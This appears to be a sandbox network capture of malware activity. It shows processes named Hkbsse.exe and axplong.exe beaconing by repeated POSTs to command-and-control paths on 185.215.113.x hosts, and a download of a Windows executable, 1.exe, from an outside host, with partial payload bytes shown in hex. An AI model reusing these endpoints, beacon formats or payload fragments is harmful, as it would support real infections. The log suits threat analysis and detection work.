Sep 3, 2024 17:13:19.176503897 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:19.196124077 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:19.460895061 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49734	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:19.585886955 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:20.532926083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:20.632594109 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:20.903166056 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49735	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:21.052880049 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:21.864298105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:21.865250111 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:22.128669024 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49736	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:22.253804922 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:23.079869032 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:23.089709044 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:23.351293087 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49737	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:23.766235113 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:24.564749002 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:24.571032047 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:24.832546949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49738	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:24.942953110 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:25.745461941 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:25.746289968 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:26.014305115 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49739	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:25.049242973 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000129001&unit=246122658369
Sep 3, 2024 17:13:25.855418921 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49740	52.212.52.84	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:25.867114067 CEST	65	OUT	GET /3846244/1.exe?hash=AgADek HTTP/1.1 Host: ddl.safone.dev
Sep 3, 2024 17:13:26.708143950 CEST	841	IN	HTTP/1.1 200 OK Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725376406&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=Vt5oH5Hgm5hlcGC8A0WMxB%2FX1l81nwTjo%2Bu9o6Dha20%3D"}]} Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725376406&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=Vt5oH5Hgm5hlcGC8A0WMxB%2FX1l81nwTjo%2Bu9o6Dha20%3D Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]} Connection: keep-alive Content-Type: application/octet-stream Range: bytes=0-3639175 Content-Range: bytes 0-3639175/3639176 Content-Disposition: attachment; filename="1.exe" Accept-Ranges: bytes Content-Length: 3639176 Date: Tue, 03 Sep 2024 15:13:26 GMT Server: Python/3.8 aiohttp/3.9.3 Via: 1.1 vegur
Sep 3, 2024 17:13:26.708168030 CEST	1236	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 Data Ascii: MZP@!L!This program must be run under Win32$7
Sep 3, 2024 17:13:26.708179951 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 11 40 00 04 00 00 00 00 00 00 00 4c 33 40 00 58 33 40 00 5c 33 40 00 60 33 40 00 54 33 40 00 b4 30 40 00 d0 30 40 00 0c 31 40 00 07 54 4f 62 6a 65 63 74 28 11 Data Ascii: @L3@X3@\3@`3@T3@0@0@1@TObject(@TObject@SystemH@IInterfaceFSystemD$AFD$_FD$iFu@@@F@@@
Sep 3, 2024 17:13:26.708190918 CEST	1236	IN	Data Raw: 53 56 57 55 8b d9 8b f2 8b e8 c7 43 04 00 00 10 00 6a 04 68 00 20 00 00 68 00 00 10 00 55 e8 a5 fd ff ff 8b f8 89 3b 85 ff 75 1f 81 c6 ff ff 00 00 81 e6 00 00 ff ff 89 73 04 6a 04 68 00 20 00 00 56 55 e8 80 fd ff ff 89 03 83 3b 00 74 23 8b d3 b8 Data Ascii: SVWUCjh hU;usjh VU;t#EuhjPb3]_^[SVWUL$$D$3T$$D$EQ;s;wFC;D$w;;t$st$C;D$vD$hjVuE
Sep 3, 2024 17:13:26.708201885 CEST	1236	IN	Data Raw: 00 6a 00 e8 dc f8 ff ff a3 24 86 45 00 83 3d 24 86 45 00 00 74 2f b8 03 00 00 00 8b 15 24 86 45 00 33 c9 89 4c 82 f4 40 3d 01 04 00 00 75 ec b8 0c 86 45 00 89 40 04 89 00 a3 18 86 45 00 c6 05 c4 85 45 00 01 33 c0 5a 59 59 64 89 10 68 e9 1a 40 00 Data Ascii: j$E=$Et/$E3L@=uE@EE3ZYYdh@=MEthEqE]US=E3Uh@d2d"=MEthEfE$EP43$EEhjCP%EuEE
Sep 3, 2024 17:13:26.708214045 CEST	1236	IN	Data Raw: 04 8b f3 03 74 24 0c 3b c6 73 08 e8 f0 fd ff ff 01 47 04 8b 07 03 47 04 3b f0 75 11 83 e8 04 ba 04 00 00 00 e8 eb fc ff ff 83 6f 04 04 8b 07 a3 20 86 45 00 8b 47 04 a3 1c 86 45 00 b0 01 83 c4 10 5f 5e 5b c3 8d 40 00 53 83 c4 f8 8b d8 8b d4 8d 43 Data Ascii: t$;sGG;uo EGE_^[@SCD<$tWu3YZ[SVV<$t&u3YZ^[@3y=$ETu@=uSVWUEEE;s
Sep 3, 2024 17:13:26.708225965 CEST	1236	IN	Data Raw: 40 00 80 3d 4d 80 45 00 00 74 0a 68 cc 85 45 00 e8 57 ef ff ff c3 e9 19 14 00 00 eb e5 8b 45 fc 5f 5e 5b 59 5d c3 8b c0 53 56 57 55 83 c4 f8 8b f2 83 c6 07 83 e6 fc 83 fe 0c 7d 05 be 0c 00 00 00 8b e8 83 ed 04 8b 7d 00 81 e7 fc ff ff 7f 8b c5 03 Data Ascii: @=MEthEWE_^[Y]SVWU}};u;+$; Eu8$) E$E=EL$ E$)E3uP$<$\|$+D$
Sep 3, 2024 17:13:26.708239079 CEST	1236	IN	Data Raw: 02 78 2a f3 a5 89 c1 83 e1 03 f3 a4 5f 5e c3 8d 74 31 fc 8d 7c 39 fc c1 f9 02 78 11 fd f3 a5 89 c1 83 e1 03 83 c6 03 83 c7 03 f3 a4 fc 5f 5e c3 3c 61 72 06 3c 7a 77 02 2c 20 c3 90 66 a3 20 60 45 00 db e2 d9 2d 20 60 45 00 c3 90 6a 00 d9 3c 24 58 Data Ascii: x*_^t1\|9x_^<ar<zw, f `E- `Ej<$X<$XZ=,Et,ESfHftIfs3=Et=Eu3gt[@P@SV3fCf=r/f=w)f%f=u
Sep 3, 2024 17:13:26.708250999 CEST	1236	IN	Data Raw: 40 00 00 00 c5 2e bc a2 b1 37 40 00 00 40 76 3a 6b 0b de 3a 40 00 00 e8 89 04 23 c7 8a 3e 40 00 00 62 ac c5 eb 78 ad 41 40 00 80 7a 17 b7 26 d7 d8 44 40 00 90 ac 6e 32 78 86 87 48 40 00 b4 57 0a 3f 16 68 a9 4b 40 00 a1 ed cc ce 1b c2 d3 4e 40 a0 Data Ascii: @.7@@v:k:@#>@bxA@z&D@n2xH@W?hK@N@@aQYR@oU@: 'X@x9?\@6_@Ngb@"E@\|oe@p+i@Ix@=AGA+BkU'9p\|B0<RB~QC/j\&Cv
Sep 3, 2024 17:13:26.708261967 CEST	1236	IN	Data Raw: 1b eb c5 31 c0 5e 5b c3 53 56 8b f2 8b d8 85 db 74 0d 8b d6 8b 03 e8 75 00 00 00 84 c0 75 05 33 c0 5e 5b c3 b0 01 5e 5b c3 8d 40 00 85 c0 74 16 89 c1 8b 09 39 d1 74 0e 8b 49 dc 85 c9 75 f3 b0 0a e9 62 f5 ff ff c3 90 57 96 eb 02 8b 36 8b 7e d0 85 Data Ascii: 1^[SVtuu3^[^[@t9tIubW6~tQftYvu_X)tG_PQYXtY+9t@u@@@Vf2ftfsPpXt^^aSVW11
Sep 3, 2024 17:13:26.708283901 CEST	1236	IN	Data Raw: 50 18 8b 48 14 74 41 ff 15 10 80 45 00 8b 54 24 1c e8 32 fd ff ff 80 3d 2c 60 45 00 00 76 1e 80 3d 28 60 45 00 00 77 15 8d 4c 24 04 50 51 e8 95 da ff ff 83 f8 00 58 0f 84 9f 00 00 00 89 c2 8b 44 24 14 8b 48 0c eb 27 80 3d 2c 60 45 00 01 76 1e 80 Data Ascii: PHtAET$2=,`Ev=(`EwL$PQXD$H'=,`Ev=(`EwPD$RQPaYZXtm1dSPRQT$(HVjPh8@RE[\|$(6&oG08@D$c#&AD$T$@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49741	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:26.323862076 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:27.156433105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:27.157124043 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:27.422647953 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49742	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:27.540237904 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:28.369885921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:28.372132063 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:28.639780998 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49743	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:28.791747093 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:29.617558002 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:29.618402004 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:30.051496029 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49744	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:30.163386106 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:30.976464033 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
